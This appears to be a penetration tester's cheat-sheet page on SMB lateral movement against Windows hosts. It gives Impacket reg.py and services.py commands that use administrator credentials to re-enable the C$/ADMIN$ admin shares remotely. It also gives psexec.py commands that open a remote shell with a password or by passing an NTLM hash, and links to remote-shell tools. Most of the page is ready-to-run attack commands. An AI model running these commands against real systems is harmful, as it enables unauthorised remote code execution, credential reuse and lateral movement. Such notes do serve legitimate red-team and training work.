SMB

Server Message Block

Enable C$ / ADMIN$ shares remotely with Impacket:

$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareServer' -vt REG_DWORD -vd 1
$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareWks' -vt REG_DWORD -vd 1
$ services.py Administrator:'Passw0rd!'@192.168.1.11 stop -name lanmanserver
$ services.py Administrator:'Passw0rd!'@192.168.1.11 start -name lanmanserver

Named Pipes

https://github.com/malcomvetter/CSExec
https://v1k1ngfr.github.io/fuegoshell/
https://github.com/v1k1ngfr/fuegoshell/
https://github.com/trustedsec/The_Shelf/tree/main/POC/impacketremoteshell

PsExec

https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec
https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm
https://sensepost.com/blog/2025/psexecing-the-right-way-and-why-zero-trust-is-mandatory/
https://github.com/sensepost/susinternals/blob/main/psexecsvc.py

psexec.py

$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/[email protected] powershell

Last updated 25 days ago